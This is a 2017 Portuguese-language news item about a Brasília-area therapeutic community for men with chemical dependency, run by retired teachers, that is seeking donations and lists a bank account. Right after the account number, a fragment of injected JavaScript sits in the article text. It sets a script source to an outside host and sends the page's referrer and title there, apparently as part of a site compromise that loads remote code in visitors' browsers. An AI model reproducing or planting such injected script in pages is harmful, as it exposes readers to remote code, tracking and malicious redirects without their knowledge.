Ajuda aos dependentes químicos

bsbcapitalPor ,04/06/2017 às 9:55, Atualizado em 18/09/2017 às 21:21

A Comunidade Terapêutica Esperança, parte social do Centro Espírita “A Caminho da Luz”, precisa de colaboração

A Comunidade Terapêutica Esperança, parte social do Centro Espírita “A Caminho da Luz”, precisa de colaboração para cuidar de dependentes químicos. A instituição atende, atualmente, 19 internos – homens com mais de 18 anos – que necessitam de alimentos, roupas e calçados. O projeto é administrado por três professoras aposentadas da Secretaria de Educação do Governo de Brasília.

“O dependente químico carece de assistência. Existem vários casos em que eles saem daqui recuperados. Diariamente, recebem cinco refeições, assistência psicológica, oftalmológica e odontológica de profissionais que atuam como voluntários. Em contrapartida, os internos colaboram com serviços prestados. A principal doença é o alcoolismo”, diz o colaborador Moacir Pereira.

O projeto foi criado há oito anos em Vicente Pires e hoje busca doações para conseguir abrigar mais dependentes químicos. Nos dias 10 e 11 de junho, das 16h às 18h, a Comunidade Terapêutica Esperança vai reunir outros centros para debater os perigos e a importância de se cuidar dos internos.

Serviço

As doações podem ser feitas por meio de depósito em dinheiro no Banco do Brasil, agência 1887-2/ conta corrente: 28729-6.s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Deixe um comentário

Rolar para cima